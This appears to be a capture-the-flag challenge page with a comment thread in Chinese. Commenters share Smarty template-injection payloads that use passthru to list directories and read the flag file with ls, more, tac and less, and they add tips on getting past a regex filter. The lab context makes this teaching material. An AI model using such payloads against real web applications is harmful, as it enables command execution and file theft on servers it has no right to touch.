评分(11)
解题动态
coolsword2023 攻破了该题 2天前
18993762527 攻破了该题 3天前
yijueo 攻破了该题 4天前
18347019165 攻破了该题 4天前
15764725014 攻破了该题 4天前
donbrothers 攻破了该题 5天前
下雨天y 攻破了该题 6天前
Sinon 攻破了该题 7天前
18956160518 攻破了该题 8天前
花椒和邻居 攻破了该题 8天前
2183919422 攻破了该题 9天前
toto 攻破了该题 9天前
0xSec 攻破了该题 9天前
15181405972 攻破了该题 10天前
jadxbug 攻破了该题 10天前
smile123 攻破了该题 11天前
种花家十号 攻破了该题 11天前
2406044613 攻破了该题 11天前
gl 攻破了该题 11天前
评论
s1amese 11月前
举报
/?w={{passthru("ls /")}} /?w={{passthru("more /_数字文件名")}}
s1amese 11月前
举报
passthru执行函数查看(ls),然后再查看列出的数字文件
gleason 1年前
举报
index.php?a={{passthru('more ../../../*|grep ff')}}
Whittebz 1年前
举报
{lf passthru("tac /_*")}{/if}
Vio1et 1年前
举报
哪位大神告诉我为什么{var_dump(`ls`)}不行
zdfy005 1年前
举报
https://blog.csdn.net/m_de_g/article/details/120380488
aWxvdmVjdGY 1年前
举报
?xxx={if passthru("less /_21752 ")}{/if}
笨笨笨蛋 1年前
举报
大佬们 你们都是怎么发现是什么模块注入的?TAT我好菜啊~~
kaikaixinxin 10月前
举报
随便传了个参数,就回显了php代码
websterchan 1年前
举报
小猿搜题
lysandria 1年前
举报
奇怪,tac不行,tail等可以。
miko 2年前
举报
smarty模板注入 看正则过滤内容 在最后查看flag的时候可以试试sort工具